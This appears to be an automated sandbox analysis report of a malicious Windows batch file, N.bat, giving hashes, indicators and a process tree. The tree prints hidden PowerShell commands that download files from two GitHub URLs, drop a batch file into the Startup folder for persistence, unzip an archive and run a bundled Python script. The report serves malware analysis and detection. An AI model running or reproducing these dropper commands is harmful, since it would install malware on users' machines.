Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240215-en, locale:en-us, os:windows7-x64, system
  • submitted
    11-05-2024 09:50

General

  • Target

    N.bat

  • Size

    28KB

  • MD5

    a32f8b613ddf66ea93311118d63bd110

  • SHA1

    fd19d211cf4b5feb8beaf5a41daca864ae6e02c6

  • SHA256

    9fb8611f27b895e6d7a42435ea9b2fb13f18b2e9ccdb715ecf3281d75e3be0fb

  • SHA512

    e0372c6e8ee4a0ee2fede0f5579d84f1fd34db57fac0c203e53e4289980e58d53533deca29e637efb4a336003eb55e74ec192a175e8e008883b241d0ce005f03

  • SSDEEP

    768:Wjj49w9xfoeRkPEE/Z4eFVohU24vN1UZ3t8XYDTZvQlhXNM47PGZYqU6Qa31lqHZ:IOZ4eFVohU24vNBORQlhXNM47Pq2L+ls

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs (exe.dropper)
    https://github.com/sdvsdv23rbfdb3/kjkj/raw/main/1

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs (exe.dropper)
    https://github.com/bao3125/ff/raw/main/Documen.zip

Signatures

  • Blocklisted process makes network request (4 IoCs)
  • Command and Scripting Interpreter: PowerShell (1 TTP, 4 IoCs)
    Run PowerShell and hide display window.
  • Drops startup file (1 IoC)
  • Suspicious behavior: EnumeratesProcesses (4 IoCs)
  • Suspicious use of AdjustPrivilegeToken (4 IoCs)
  • Suspicious use of WriteProcessMemory (39 IoCs)

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\N.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2416
    • C:\Windows\system32\chcp.com
      chcp.com 437
      2⤵
      PID:2296
    • C:\Windows\system32\find.exe
      find
      2⤵
      PID:1664
    • C:\Windows\system32\findstr.exe
      findstr /L /I set C:\Users\Admin\AppData\Local\Temp\N.bat
      2⤵
      PID:1856
    • C:\Windows\system32\findstr.exe
      findstr /L /I goto C:\Users\Admin\AppData\Local\Temp\N.bat
      2⤵
      PID:2376
    • C:\Windows\system32\findstr.exe
      findstr /L /I echo C:\Users\Admin\AppData\Local\Temp\N.bat
      2⤵
      PID:2368
    • C:\Windows\system32\findstr.exe
      findstr /L /I pause C:\Users\Admin\AppData\Local\Temp\N.bat
      2⤵
      PID:1708
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c type tmp
      2⤵
      PID:2852
    • C:\Windows\system32\find.exe
      find
      2⤵
      PID:1948
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c type tmp
      2⤵
      PID:2328
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/sdvsdv23rbfdb3/kjkj/raw/main/1', 'C:\Users\Admin\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Drops startup file
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3060
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/bao3125/ff/raw/main/Documen.zip', 'C:\Users\Public\Document.zip')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2488
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2464
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\python C:\Users\Public\Document\Lib\sim.py"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3008

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\tmp
    Filesize
    14B
    MD5
    ce585c6ba32ac17652d2345118536f9c
    SHA1
    be0e41b3690c42e4c0cdb53d53fc544fb46b758d
    SHA256
    589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3
    SHA512
    d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize
    7KB
    MD5
    1b5b4d82f6120ac012077a2748c487a4
    SHA1
    3a28e4991f7b2772b9c5d5f027bd54b5bd89a8ab
    SHA256
    b5c5ebdb227c64ca85a3e280fc4d11be0fdb6f336637c1989a9a30d857235d8f
    SHA512
    58f58235eb2ae18c2a8d99137e75539af2b027da2ec16416a74ff488e4aabf9c70d7f6dfa6b5be848481dfce40ae2532730c6779ece16a28f0bfb5c80239a218

  • memory/2488-17-0x000000001B690000-0x000000001B972000-memory.dmp
    Filesize
    2.9MB

  • memory/2488-18-0x0000000001E80000-0x0000000001E88000-memory.dmp
    Filesize
    32KB

  • memory/3060-8-0x0000000002BD0000-0x0000000002C50000-memory.dmp
    Filesize
    512KB

  • memory/3060-9-0x000000001B570000-0x000000001B852000-memory.dmp
    Filesize
    2.9MB

  • memory/3060-10-0x0000000002310000-0x0000000002318000-memory.dmp
    Filesize
    32KB

  • memory/3060-11-0x0000000002BD0000-0x0000000002C50000-memory.dmp
    Filesize
    512KB